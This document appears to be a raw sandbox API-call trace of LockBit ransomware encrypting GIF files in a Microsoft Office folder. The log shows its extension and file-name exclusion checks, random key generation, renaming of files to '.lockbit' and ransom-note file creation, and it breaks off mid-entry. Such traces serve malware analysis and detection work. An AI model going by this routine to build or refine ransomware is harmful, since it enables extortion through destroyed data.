1 [0203.265] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14582_.GIF") returned 1 [0203.265] lstrcmpiW (lpString1="ntldr", lpString2="BD14582_.GIF") returned 1 [0203.265] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14582_.GIF") returned 1 [0203.265] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14582_.GIF") returned 1 [0203.265] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14582_.GIF") returned -1 [0203.265] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14582_.GIF") returned 1 [0203.265] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14582_.GIF") returned 1 [0203.265] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.265] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF") returned=".GIF" [0203.265] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.265] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.265] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.266] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.266] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.266] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.266] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.266] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.266] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.266] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF.lockbit") returned 78 [0203.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14582_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.267] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.267] malloc (_Size=0x40068) returned 0x3df0008 [0203.267] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0203.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.268] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.272] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.272] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.272] free (_Block=0x1fa2ed8) [0203.272] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.272] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.272] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.272] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8115e400, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc952300, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8115e400, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14583_.GIF", cAlternateFileName="")) returned 1 [0203.273] lstrcmpiW (lpString1=".", lpString2="BD14583_.GIF") returned -1 [0203.273] lstrcmpiW (lpString1="..", lpString2="BD14583_.GIF") returned -1 [0203.273] PathFindExtensionW (pszPath="BD14583_.GIF") returned=".GIF" [0203.273] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.273] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.273] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.273] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.273] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.273] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.273] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.273] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.273] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.273] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.274] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.274] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14583_.GIF") returned 1 [0203.275] lstrcmpiW (lpString1="ntldr", lpString2="BD14583_.GIF") returned 1 [0203.275] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14583_.GIF") returned 1 [0203.275] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14583_.GIF") returned 1 [0203.275] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14583_.GIF") returned -1 [0203.275] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14583_.GIF") returned 1 [0203.275] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14583_.GIF") returned 1 [0203.275] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.275] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF") returned=".GIF" [0203.275] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.275] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.275] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.276] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.276] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF.lockbit") returned 78 [0203.276] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14583_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.278] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.278] malloc (_Size=0x40068) returned 0x3df0008 [0203.278] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=175) returned 1 [0203.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.279] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.281] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.281] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.281] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.281] free (_Block=0x1fa2ed8) [0203.281] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14583_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.281] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.281] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.281] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4a53e00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc952300, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb4a53e00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14654_.GIF", cAlternateFileName="")) returned 1 [0203.281] lstrcmpiW (lpString1=".", lpString2="BD14654_.GIF") returned -1 [0203.281] lstrcmpiW (lpString1="..", lpString2="BD14654_.GIF") returned -1 [0203.282] PathFindExtensionW (pszPath="BD14654_.GIF") returned=".GIF" [0203.282] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.282] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.282] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.283] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14654_.GIF") returned 1 [0203.283] lstrcmpiW (lpString1="ntldr", lpString2="BD14654_.GIF") returned 1 [0203.283] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14654_.GIF") returned 1 [0203.283] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14654_.GIF") returned 1 [0203.283] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14654_.GIF") returned -1 [0203.283] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14654_.GIF") returned 1 [0203.283] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14654_.GIF") returned 1 [0203.283] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF") returned=".GIF" [0203.283] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.283] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.283] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.283] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.283] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.284] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.284] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.284] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF.lockbit") returned 78 [0203.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14654_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.285] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.285] malloc (_Size=0x40068) returned 0x3df0008 [0203.285] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0203.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.286] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.290] malloc 